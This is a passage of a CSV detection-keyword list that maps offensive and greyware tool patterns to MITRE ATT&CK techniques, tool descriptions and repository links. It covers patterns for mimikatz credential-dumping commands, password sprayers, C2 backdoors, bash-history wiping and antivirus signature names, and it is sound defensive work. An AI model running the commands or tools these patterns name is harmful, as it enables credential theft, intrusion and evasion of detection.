+"*trevorspray -*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
+"*trevorspray *--recon *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*trevorspray -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*trevorspray.cli*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.enumerators*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.looters*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.py*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.sprayers*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray/existent_users.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray/valid_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-dev*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-master*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-trevorspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*tricks01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*trickster0/Enyx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*tricky.lnk*","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. 
the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","105","38","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" +"*TROJ_ZIPBOMB.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Trojan.Linux*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan.Win32.*.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan.WinGo*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan/Win32*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan/Win64*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:PowerShell*","signature_keyword","Antivirus 
Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","trojan powershell signatures","10","10","N/A","N/A","N/A","N/A" +"*Trojan:Win32*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:Win32/IceId*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:Win32/Trickbot*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:Win64*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Trojan:Win64/IceId*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*TrojanDropper:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*TrojanSpy:MSIL/JSSLoader*","signature_keyword","Antivirus Signature","antivirus signatures","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*TrojanSpy:MSIL/JSSLoader*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*truecrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" 
+"*True-Demon*","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/True-Demon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*trufflehog git *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*truffleHog*","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1083 - T1081 - T1213 - T1212","TA0002 - TA0003 - TA0004 - TA0007","N/A","N/A","Information Gathering","https://github.com/dxa4481/truffleHog","1","0","N/A","N/A","10","12176","1422","2023-10-04T20:56:03Z","2016-12-31T05:08:12Z" +"*TruffleSnout.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*truncate -s0 *bash_history'*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. 
","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*--trusted-for-delegation --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*TrustedPath-UACBypass-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*trustedsec/social-engineer-toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","1","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*trustedsec/unicorn*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*TryCatchHCF*","offensive_tool_keyword","Github Username","github repo hosting sniffing spoofing and data exfiltration tools","N/A","N/A","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ts.php*vi.txt*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - 
TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ts::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::mstsc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::multirdp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::remote*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*ts::sessions*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*tshark *-i *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tshark -f *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tshark -Q*","greyware_tool_keyword","wireshark","Wireshark is a network 
protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tshark -r *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tshark*.deb*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tspkg/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*ttyd -i 0.0.0.0 -p 7681 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*ttyd -i 0.0.0.0 -p 7682 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*TunnelGRE/Augustus*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" +"*tunnels-prod-rel-tm.trafficmanager.net*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*turn_keylogger*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","base64","start of an executable payload in base64","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*TVqQAAMAAAAEAAAA*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*twint -g=*km* -o * --csv*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*twint -u * --since *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*twittor.py*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*twittor-master.zip*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*TWV0YXNwbG9pdCBSUEMgTG9hZGVy*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Tycx2ry/SweetPotato*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
